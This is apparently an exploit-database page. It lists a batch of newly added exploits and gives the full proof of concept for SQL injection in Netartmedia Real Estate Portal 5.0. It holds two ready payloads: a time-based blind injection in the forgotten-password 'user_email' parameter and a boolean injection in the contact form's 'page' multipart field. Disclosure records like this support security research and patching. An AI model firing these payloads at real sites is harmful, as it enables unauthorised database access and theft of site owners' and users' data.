2afed97ceb
16 changes to exploits/shellcodes libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Microsoft VBScript - VbsErase Memory Corruption Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Google Chrome < M73 - MidiManagerWin Use-After-Free Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Advanced Host Monitor 11.92 beta - Local Buffer Overflow Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit) TheCarProject v2 - Multiple SQL Injection TheCarProject 2 - Multiple SQL Injection Gila CMS 1.9.1 - Cross-Site Scripting MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting eNdonesia Portal 8.7 - Multiple Vulnerabilities Netartmedia Event Portal 2.0 - 'Email' SQL Injection Netartmedia PHP Mall 4.1 - SQL Injection Netartmedia Real Estate Portal 5.0 - SQL Injection
58 lines
No EOL
1.7 KiB
Text
58 lines
No EOL
1.7 KiB
Text
# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
|
|
# Date: 19.03.2019
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor Homepage: https://www.netartmedia.net/realestate/
|
|
# Demo Site: https://www.phpscriptdemos.com/realestate/
|
|
# Version: 5.0
|
|
# Tested on: Kali Linux
|
|
# CVE: N/A
|
|
# Description: The real estate portal software is made to be
|
|
multi-language, the main site can show multiple languages and let the site
|
|
visitors choose their preferred language.
|
|
|
|
----- PoC 1: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/index.php
|
|
Parameter: user_email (POST)
|
|
Payload:
|
|
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
|
|
OR SLEEP(5)#
|
|
|
|
----- PoC 2: SQLi -----
|
|
|
|
Request: http://localhost/[PATH]/index.php
|
|
Parameter: MULTIPART page ((custom) POST
|
|
Payload:
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="SubmitContact"
|
|
|
|
1
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="code"
|
|
|
|
94102
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="email"
|
|
|
|
sample@email.tst
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="message"
|
|
|
|
20
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
${alpharand}
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="page"
|
|
|
|
en_Contact-2228' OR 3801=3801-- eISZ
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="phone"
|
|
|
|
555-666-0606
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
|
|
Content-Disposition: form-data; name="subject"
|
|
|
|
1
|
|
------WebKitFormBoundaryYUBPFrrBhV4S4pf0-- |